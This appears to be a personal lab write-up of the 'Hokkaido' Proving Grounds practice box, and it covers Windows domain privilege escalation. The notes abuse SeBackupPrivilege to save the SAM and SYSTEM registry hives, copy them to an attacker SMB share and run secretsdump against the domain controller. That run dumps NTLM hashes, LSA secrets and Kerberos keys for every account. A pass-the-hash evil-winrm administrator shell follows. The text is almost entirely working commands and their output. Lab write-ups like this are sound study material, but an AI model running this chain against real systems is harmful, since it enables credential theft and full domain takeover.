SeBackupPrivilege and SeRestorePrivilege

The current user, molly.smith is part of the privileged Server Operators group, granting both SeBackupPrivilege and SeRestorePrivilege privileges

Registry Hives

PS C:\tmp> reg save HKLM\SAM sam
The operation completed successfully.
PS C:\tmp> reg save HKLM\SYSTEM system
The operation completed successfully.

Exfiltrating SAM and SYSTEM

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ simplesmb . -smb2support -username molly.smith -password qwer1234
 
PS C:\tmp> copy .\sam \\192.168.45.235\smb\
PS C:\tmp> copy .\system \\192.168.45.235\smb\

Transfer complete

Hashdump (Local)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-secretsdump local -sam ./sam -system ./system                                                         
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

NTLM hash of the DA; Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::

Hashdump (Domain)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-secretsdump HOKKAIDO-AEROSPACE.COM/administrator@dc.hokkaido-aerospace.com -k -hashes :d752482897d54e239376fddb2a2109e4 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HAERO\DC$:plain_password_hex:b3afd11985dcc3571916b9625a265cee90a3dcdadd7970b027cf0988630567f6b8c07012bbd345a9d13fa816a7eaaef7f4e79e177c87ebf245eed3518c0a38caeff97d0a71e6725d3e875e8ab66990904e4e3a1e4cccc8383916e9926be82e1db3c6aae95db6d8fa8cc7eede9f26e8bd50eb229cef1d375fd238fc0bfc382ee74eb822ca9305e6242037961e2b504ef1b46716c3dfa7c03fa777a979f9ccb038348f6874a98828a945414803e3665eb553196b3cc97b4586117be9cf10495d9f12162d36ce93142c2da0c0cd2cad7df1aa9279d5aca5abd3b763afca778e3a7866f84d65a1870542269a1fe21a1ba0ec
HAERO\DC$:aad3b435b51404eeaad3b435b51404ee:08ba0d0a8e79546c6fdf14b8d8aa43fa:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x17be0c502328c5095440056009f4e84133a1bf6d
dpapi_userkey:0x139e0fced249bdffdc30b963f8b2d0e75e921a31
[*] NL$KM 
 0000   88 9D 89 73 C2 4E C1 56  9C B0 B1 61 4D 3A 39 18   ...s.N.V...aM:9.
 0010   46 33 E9 54 01 9D 3A 4A  97 BD 7E 87 AC A4 0D 56   F3.T..:J..~....V
 0020   11 35 AE 74 A4 09 60 A0  BD 49 40 B7 6E F6 54 5C   .5.t..`..I@.n.T\
 0030   A3 E1 A6 4F 10 B6 32 E2  36 97 F9 96 45 78 A2 6A   ...O..2.6...Ex.j
NL$KM:889d8973c24ec1569cb0b1614d3a39184633e954019d3a4a97bd7e87aca40d561135ae74a40960a0bd4940b76ef6545ca3e1a64f10b632e23697f9964578a26a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e1a2efb311b464c23a72ee9ba4071a37:::
hokkaido-aerospace.com\Hazel.Green:1106:aad3b435b51404eeaad3b435b51404ee:a921ee3ff4e1f1fdb4d82f2f49ac3f4f:::
hokkaido-aerospace.com\Molly.Smith:1107:aad3b435b51404eeaad3b435b51404ee:0a640404b5c386ab12092587fe19cd02:::
hokkaido-aerospace.com\Alexandra.Little:1108:aad3b435b51404eeaad3b435b51404ee:33a720e023cec07cbcf8f96702119fe8:::
hokkaido-aerospace.com\Victor.Kelly:1110:aad3b435b51404eeaad3b435b51404ee:1b6761110e36db9f98decf1bacd3b827:::
hokkaido-aerospace.com\Catherine.Knight:1111:aad3b435b51404eeaad3b435b51404ee:8ba96f3a4c6f41cc0e7ec96bd3734854:::
hokkaido-aerospace.com\Angela.Davies:1112:aad3b435b51404eeaad3b435b51404ee:bb0dd6b7c7f2bfa9119fe0e143b9c5ae:::
hokkaido-aerospace.com\Molly.Edwards:1113:aad3b435b51404eeaad3b435b51404ee:966db8d41fcdb1bcbcc14d6b86fd8cb2:::
hokkaido-aerospace.com\Tracy.Wood:1114:aad3b435b51404eeaad3b435b51404ee:d970d0d7da0f0be64552db5fa8cced6a:::
hokkaido-aerospace.com\Lynne.Tyler:1115:aad3b435b51404eeaad3b435b51404ee:c4dd38dc3787b1ff15ecd4fb97bcd623:::
hokkaido-aerospace.com\Charlene.Wallace:1116:aad3b435b51404eeaad3b435b51404ee:b3d7b6c42da6e315f8dc8bafe5035d2e:::
hokkaido-aerospace.com\Cheryl.Singh:1117:aad3b435b51404eeaad3b435b51404ee:0e2a323024e899406868caa5ce2f3568:::
hokkaido-aerospace.com\Sian.Gordon:1118:aad3b435b51404eeaad3b435b51404ee:5aed6166fd0794dedb3bae35a6b0badb:::
hokkaido-aerospace.com\Gordon.Brown:1119:aad3b435b51404eeaad3b435b51404ee:add686794d6d5d27ee7c2db198079202:::
hokkaido-aerospace.com\Irene.Dean:1120:aad3b435b51404eeaad3b435b51404ee:acc68ff39c4b4d8dc9d8495b625a4047:::
hokkaido-aerospace.com\Anthony.Anderson:1121:aad3b435b51404eeaad3b435b51404ee:9102d21a55e564beff28ab735787e902:::
hokkaido-aerospace.com\Julian.Davies:1122:aad3b435b51404eeaad3b435b51404ee:d12485fc4cc3b3e971ff4d33baea8050:::
hokkaido-aerospace.com\Hannah.O'Neill:1123:aad3b435b51404eeaad3b435b51404ee:c7feffad69751d052d119f299301abda:::
hokkaido-aerospace.com\Rachel.Jones:1124:aad3b435b51404eeaad3b435b51404ee:c5f3e01bafc9f6e67a10c80d617c881f:::
hokkaido-aerospace.com\Declan.Woodward:1125:aad3b435b51404eeaad3b435b51404ee:7214822671cf4ae2d57f2a9aaa17302d:::
hokkaido-aerospace.com\Annette.Buckley:1126:aad3b435b51404eeaad3b435b51404ee:8d85c3a169d3fea45989d949c99d7e8b:::
hokkaido-aerospace.com\Elliott.Jones:1127:aad3b435b51404eeaad3b435b51404ee:5f5e66ab6bd24e07585216783c22b6be:::
hokkaido-aerospace.com\Grace.Lees:1128:aad3b435b51404eeaad3b435b51404ee:6bf96fb4fadff6bd8584c8877e5b58ee:::
hokkaido-aerospace.com\Deborah.Francis:1129:aad3b435b51404eeaad3b435b51404ee:cd6a9df1b7b90c2f7add25d0e305be6c:::
hokkaido-aerospace.com\Bruce.Cartwright:1131:aad3b435b51404eeaad3b435b51404ee:ace3029630ed1ecfb8e6c577bd3c7007:::
hokkaido-aerospace.com\Nigel.Brown:1132:aad3b435b51404eeaad3b435b51404ee:ecbed1ce6dcf20f2b3b88be1c906e3c2:::
hokkaido-aerospace.com\Derek.Wyatt:1133:aad3b435b51404eeaad3b435b51404ee:ba1b4de79ce5dbf6631d163d036956e5:::
hokkaido-aerospace.com\discovery:1134:aad3b435b51404eeaad3b435b51404ee:6dfcb20c87d04f9a4f9605f2413395d4:::
hokkaido-aerospace.com\maintenance:1135:aad3b435b51404eeaad3b435b51404ee:117bc7e4764997b2efb9b83578ca2a1e:::
hokkaido-aerospace.com\hrapp-service:1139:aad3b435b51404eeaad3b435b51404ee:30a08e45b7788fa08fd3dc127c435e5f:::
hokkaido-aerospace.com\info:1601:aad3b435b51404eeaad3b435b51404ee:068545e382b7feef8647f6402a68b5f0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:08ba0d0a8e79546c6fdf14b8d8aa43fa:::
LANSWEEPER$:1136:aad3b435b51404eeaad3b435b51404ee:8b25d34dd952412ae5f60a4171b5e33e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72fbb5b970c9f5aca790a529359d41d2488395fecd41444b30aaa5a0af4e35a1
Administrator:aes128-cts-hmac-sha1-96:3bc0b0efc71a524204271c78b2fa0b61
Administrator:des-cbc-md5:10c2fb230bd6b3b3
krbtgt:aes256-cts-hmac-sha1-96:7dd84c99bd2a20aa901d5c29717cdbab0fcfcc82555da80c97cba1882be3a104
krbtgt:aes128-cts-hmac-sha1-96:41020b735cccf2898636a933bdeba8c3
krbtgt:des-cbc-md5:292ab570d6682cad
hokkaido-aerospace.com\Hazel.Green:aes256-cts-hmac-sha1-96:d160d3f78cb708c0026e4ac773eac83adbdc59e61e88204b8950b23f4b0e320c
hokkaido-aerospace.com\Hazel.Green:aes128-cts-hmac-sha1-96:a62a29342eccab0d711f6a10689d6cc8
hokkaido-aerospace.com\Hazel.Green:des-cbc-md5:7ccef2706e57c4b0
hokkaido-aerospace.com\Molly.Smith:aes256-cts-hmac-sha1-96:3ac1017ed9eb6dd654637bf94ecc02c3625e9f907bdd8f460fe877e32b80a149
hokkaido-aerospace.com\Molly.Smith:aes128-cts-hmac-sha1-96:10217de58a5508a8f70d35ca68d4342d
hokkaido-aerospace.com\Molly.Smith:des-cbc-md5:3dd526c231071552
hokkaido-aerospace.com\Alexandra.Little:aes256-cts-hmac-sha1-96:8bb5af5b912a91591bbc8009e590da3a804e4d9bff2ba9f2f8365db5ae616deb
hokkaido-aerospace.com\Alexandra.Little:aes128-cts-hmac-sha1-96:3b3f66fa96cc89f41ee9d22a3eacf427
hokkaido-aerospace.com\Alexandra.Little:des-cbc-md5:f7b31902d975948a
hokkaido-aerospace.com\Victor.Kelly:aes256-cts-hmac-sha1-96:28b2ab957d720af3b52c2cce9bc6c8be8ff39f5236fbe3e2564e9dcbdac49c3d
hokkaido-aerospace.com\Victor.Kelly:aes128-cts-hmac-sha1-96:0832498dfca8813e9b0edbf55eb72883
hokkaido-aerospace.com\Victor.Kelly:des-cbc-md5:4a3d25462ae9c4a1
hokkaido-aerospace.com\Catherine.Knight:aes256-cts-hmac-sha1-96:1a10c38c74eae62c80647030a6bf9b10f3ad1409ea143782e7ee86078be8a6ab
hokkaido-aerospace.com\Catherine.Knight:aes128-cts-hmac-sha1-96:0d54c91f9e64e67857330cbea5072844
hokkaido-aerospace.com\Catherine.Knight:des-cbc-md5:387fe96d4934f73b
hokkaido-aerospace.com\Angela.Davies:aes256-cts-hmac-sha1-96:82b21878b86a3793f29399d365045836313f3a6ec77c8a311193d06e334c6873
hokkaido-aerospace.com\Angela.Davies:aes128-cts-hmac-sha1-96:dea8bc13651322738ed3d8c8b3bd3252
hokkaido-aerospace.com\Angela.Davies:des-cbc-md5:eab9adbc325b7f94
hokkaido-aerospace.com\Molly.Edwards:aes256-cts-hmac-sha1-96:bcc8a5d013627c0eec3df5689eefed4a7ad3eec5ad231814198c0d55ec9e1680
hokkaido-aerospace.com\Molly.Edwards:aes128-cts-hmac-sha1-96:e4dd358c98ca741fb7ddc4aaee663936
hokkaido-aerospace.com\Molly.Edwards:des-cbc-md5:e93440eadaad8398
hokkaido-aerospace.com\Tracy.Wood:aes256-cts-hmac-sha1-96:ed49a21cb2662963756fbe77f03097d848b239388fa1bc7ce5b686d48959ad5c
hokkaido-aerospace.com\Tracy.Wood:aes128-cts-hmac-sha1-96:2ccf89b8905f9ac0fa6d9a0ab5b74ab3
hokkaido-aerospace.com\Tracy.Wood:des-cbc-md5:f1546e31701f26dc
hokkaido-aerospace.com\Lynne.Tyler:aes256-cts-hmac-sha1-96:e5ff1b5ce55b0b3bfec81a36ba38c13a351138ca3236e50f553c4cb358d20c2e
hokkaido-aerospace.com\Lynne.Tyler:aes128-cts-hmac-sha1-96:deffd28ca3b78dfd2870aa1c18419da4
hokkaido-aerospace.com\Lynne.Tyler:des-cbc-md5:1adc4c6d8992cd01
hokkaido-aerospace.com\Charlene.Wallace:aes256-cts-hmac-sha1-96:e888cfb00f00a2d8c67a429a0a27112f40e1bc69ded1cdc32e4cf8f79d03a527
hokkaido-aerospace.com\Charlene.Wallace:aes128-cts-hmac-sha1-96:2e4a8c22613204e0f096e61209115202
hokkaido-aerospace.com\Charlene.Wallace:des-cbc-md5:3e3d3bdf8c576e0d
hokkaido-aerospace.com\Cheryl.Singh:aes256-cts-hmac-sha1-96:4ad05e170ea375aafc10c4d39a30adce1f48fcae7cf7984454c0d4ef244c66a0
hokkaido-aerospace.com\Cheryl.Singh:aes128-cts-hmac-sha1-96:80b46f519ca4af00c11b3996a3dcb895
hokkaido-aerospace.com\Cheryl.Singh:des-cbc-md5:c1bcbc1fe675fb0d
hokkaido-aerospace.com\Sian.Gordon:aes256-cts-hmac-sha1-96:66ec1cc90ee13f8badbdb0cd285fb9780a83c1971fcde9c4a022a44191f3d293
hokkaido-aerospace.com\Sian.Gordon:aes128-cts-hmac-sha1-96:7086f1995c89e9648f3e8c9136ca92b7
hokkaido-aerospace.com\Sian.Gordon:des-cbc-md5:26fd62b60b08f2d0
hokkaido-aerospace.com\Gordon.Brown:aes256-cts-hmac-sha1-96:e2740c364791233f8c070c47b2aac7df19d019f0215b22b6bd1dcd39a20cbdbb
hokkaido-aerospace.com\Gordon.Brown:aes128-cts-hmac-sha1-96:5de15ad81f4fb665a2c860227d2806fd
hokkaido-aerospace.com\Gordon.Brown:des-cbc-md5:58e667bc1cd57386
hokkaido-aerospace.com\Irene.Dean:aes256-cts-hmac-sha1-96:b43bb1745e444205db7dd6d62ca3e0359708e45e340c46f1dd2cb8536fa7e6af
hokkaido-aerospace.com\Irene.Dean:aes128-cts-hmac-sha1-96:76cd3276bf06ce44f098d2353940f4a8
hokkaido-aerospace.com\Irene.Dean:des-cbc-md5:3219c43d2989c492
hokkaido-aerospace.com\Anthony.Anderson:aes256-cts-hmac-sha1-96:0a8ce38f9e3022ce0ce4b54cd9d2eb2a4b49560dc87d5f2cf40b8d10d7b9f92e
hokkaido-aerospace.com\Anthony.Anderson:aes128-cts-hmac-sha1-96:1016a934cb23fb5546c3abc12fd61416
hokkaido-aerospace.com\Anthony.Anderson:des-cbc-md5:b02079c423b9cdb0
hokkaido-aerospace.com\Julian.Davies:aes256-cts-hmac-sha1-96:326bf183b85485b1e2745cc29af52edf2b9aeb6982943f6344cd0d4b7696dcf2
hokkaido-aerospace.com\Julian.Davies:aes128-cts-hmac-sha1-96:39c07aa632e195b197cbd205ea1a73fe
hokkaido-aerospace.com\Julian.Davies:des-cbc-md5:75e3c23802fdea26
hokkaido-aerospace.com\Hannah.O'Neill:aes256-cts-hmac-sha1-96:8e28b5f61b55b0f920cc2bc73118108b816306ec9e4421d4fc242b0af0168eb2
hokkaido-aerospace.com\Hannah.O'Neill:aes128-cts-hmac-sha1-96:624e3b707dec406a87e967d8c97654c8
hokkaido-aerospace.com\Hannah.O'Neill:des-cbc-md5:6df1c2f1a17a9dae
hokkaido-aerospace.com\Rachel.Jones:aes256-cts-hmac-sha1-96:e0df448cc7b32a121a4bd684d6551ca1e1e9a6a2fb04402305655022108bb538
hokkaido-aerospace.com\Rachel.Jones:aes128-cts-hmac-sha1-96:abe36eff4fe38a8904862470845e5b4f
hokkaido-aerospace.com\Rachel.Jones:des-cbc-md5:0db3294cabc24631
hokkaido-aerospace.com\Declan.Woodward:aes256-cts-hmac-sha1-96:31791a93359f47ab06d80d0a2682a0228ad5935faef108b52f810daf50ed1538
hokkaido-aerospace.com\Declan.Woodward:aes128-cts-hmac-sha1-96:586ac68906cccfd553f4fe45ae40e818
hokkaido-aerospace.com\Declan.Woodward:des-cbc-md5:e5c72cb3f864e5ea
hokkaido-aerospace.com\Annette.Buckley:aes256-cts-hmac-sha1-96:82311bca3505966f07fc31d106c7c6c7d0d802b7293b71953bbec9c5a2929195
hokkaido-aerospace.com\Annette.Buckley:aes128-cts-hmac-sha1-96:0e19be03e8589c09026d753d03a9d647
hokkaido-aerospace.com\Annette.Buckley:des-cbc-md5:d6ecc4c29b6dba54
hokkaido-aerospace.com\Elliott.Jones:aes256-cts-hmac-sha1-96:52884c0c586417594649b026fafc1aa2b0d927f7d43075b04065c74c611398c5
hokkaido-aerospace.com\Elliott.Jones:aes128-cts-hmac-sha1-96:94299cb30d0b2d73ce085a5d75124e7e
hokkaido-aerospace.com\Elliott.Jones:des-cbc-md5:4ff2bf766b3713d3
hokkaido-aerospace.com\Grace.Lees:aes256-cts-hmac-sha1-96:734b0244bd043b87cfd05851b04739e326c95c3c9fda68748d2df066d9a8a370
hokkaido-aerospace.com\Grace.Lees:aes128-cts-hmac-sha1-96:ab8f57e3b6b3e8bf0dd7786379f04887
hokkaido-aerospace.com\Grace.Lees:des-cbc-md5:daa102dfb6ec8c98
hokkaido-aerospace.com\Deborah.Francis:aes256-cts-hmac-sha1-96:d5d2a7131e77e1d648d322b66de70764b1692039e800dbecd6a668605e31a293
hokkaido-aerospace.com\Deborah.Francis:aes128-cts-hmac-sha1-96:506bc190836ea46597cb06802bb4ef64
hokkaido-aerospace.com\Deborah.Francis:des-cbc-md5:6b9e867aab3dbcea
hokkaido-aerospace.com\Bruce.Cartwright:aes256-cts-hmac-sha1-96:61170d2e6404a923959b4629390ea4de593ef887c9f776aa9987d1ce602b1e21
hokkaido-aerospace.com\Bruce.Cartwright:aes128-cts-hmac-sha1-96:0be33830640b0b495086571f56ca9477
hokkaido-aerospace.com\Bruce.Cartwright:des-cbc-md5:3e73d9a8ab295485
hokkaido-aerospace.com\Nigel.Brown:aes256-cts-hmac-sha1-96:281a906a1d7d605d30f5766e3746446bebe9211dcdd50ee9acce2e01a296e138
hokkaido-aerospace.com\Nigel.Brown:aes128-cts-hmac-sha1-96:a21fb067edb217e190549dbd29290a46
hokkaido-aerospace.com\Nigel.Brown:des-cbc-md5:801cfee61aa1a885
hokkaido-aerospace.com\Derek.Wyatt:aes256-cts-hmac-sha1-96:8cbb0f0108eeb740451a6028191e7df323b1ce2548bf22997ee4801d572068c6
hokkaido-aerospace.com\Derek.Wyatt:aes128-cts-hmac-sha1-96:3c54bfbce43f53b78c6693c1bccc490b
hokkaido-aerospace.com\Derek.Wyatt:des-cbc-md5:43b313916ee3166b
hokkaido-aerospace.com\discovery:aes256-cts-hmac-sha1-96:41a0e0900e3870478f88d3c8962bb385554beb70a26051961df66df87847abdd
hokkaido-aerospace.com\discovery:aes128-cts-hmac-sha1-96:9fe43389bd2a69d61a7e53362585b7e6
hokkaido-aerospace.com\discovery:des-cbc-md5:b00ec19b9219918c
hokkaido-aerospace.com\maintenance:aes256-cts-hmac-sha1-96:7b863486a5cfd5b017586cef2a0c9634c30f25e1daca1ceefe5605d091808fb5
hokkaido-aerospace.com\maintenance:aes128-cts-hmac-sha1-96:71abb0699d48cd3eeb427ded16cfa684
hokkaido-aerospace.com\maintenance:des-cbc-md5:52298354574ada20
hokkaido-aerospace.com\hrapp-service:aes256-cts-hmac-sha1-96:9124c4326ab87f590ca209b9dce6f22c35e63dce278da52c2f641cecb325d3f9
hokkaido-aerospace.com\hrapp-service:aes128-cts-hmac-sha1-96:cb43271257cbc44d82daa21c57b2914c
hokkaido-aerospace.com\hrapp-service:des-cbc-md5:58ecb9b62a626bf8
hokkaido-aerospace.com\info:aes256-cts-hmac-sha1-96:a1dd922016ca074ee8041711ca5f8e6e4b1555896b0e34593ea62e16a35f4b73
hokkaido-aerospace.com\info:aes128-cts-hmac-sha1-96:b418b058a07cec0fc0d30511372083c7
hokkaido-aerospace.com\info:des-cbc-md5:3445342c6b8f643b
DC$:aes256-cts-hmac-sha1-96:d5a3ac9641ef67dda677621c5d5c3845fc49bba4ad7de3aebaca91d2627680ce
DC$:aes128-cts-hmac-sha1-96:353660cbc001f1dc95d99e46697d7b6d
DC$:des-cbc-md5:ab5e26ef2031830e
LANSWEEPER$:aes256-cts-hmac-sha1-96:582fea0ea2a02d60c982ceb5d187e2f8f5a37cc64c2f0a5dca747dce09e1a9e8
LANSWEEPER$:aes128-cts-hmac-sha1-96:d1ff2906bae4e53fdabba8bf10ae3807
LANSWEEPER$:des-cbc-md5:e93eab79ce6462fd
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Shelldrop

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ evil-winrm -i dc.hokkaido-aerospace.com -u administrator -H d752482897d54e239376fddb2a2109e4                                               
 
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
haero\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::6467:326:cc38:9299%6
   IPv4 Address. . . . . . . . . . . : 192.168.119.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.119.254

System level compromise

InfoSec LAB

Explorer

Hokkaido_Privilege_Escalation

SeBackupPrivilege and SeRestorePrivilege

Registry Hives

Hashdump (Local)

Hashdump (Domain)

Shelldrop

Interactive Graph View

Table of Contents

Backlinks